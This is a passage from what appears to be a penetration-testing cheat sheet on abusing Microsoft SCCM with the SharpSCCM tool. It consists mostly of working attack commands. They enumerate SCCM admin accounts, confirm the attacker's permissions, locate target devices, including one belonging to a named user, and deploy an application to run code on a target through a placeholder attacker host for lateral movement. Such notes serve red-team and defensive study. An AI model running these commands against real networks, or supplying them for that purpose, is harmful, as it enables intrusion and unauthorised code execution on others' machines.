# enumerate admin and special accounts
.\SharpSCCM.exe get class-instances SMS_ADMIN
.\SharpSCCM.exe get class-instances SMS_SCI_Reserved
Application Deployment
After the enumeration phase it's time to move laterally. Currently the only method I know of to abuse SCCM components for lateral movement is by creating and deploying an application/script to execute code on another device.
# Confirm access permissions - Confirm your current account holds sufficient SCCM administrative permission to pull off your execution plan:
.\SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames
# Find target devices to exploit, must be active and online
## Search for device of user "Frank.Zapper"
.\SharpSCCM.exe get primary-users -u Frank.Zapper
## List all active SCCM devices where the SCCM client is installed
### CAUTION: This could be huge
.\SharpSCCM.exe get devices -w "Active=1 and Client=1"
# Deploy Application to target device
.\SharpSCCM.exe exec -rid <TargetResourceID> -r <AttackerHost>
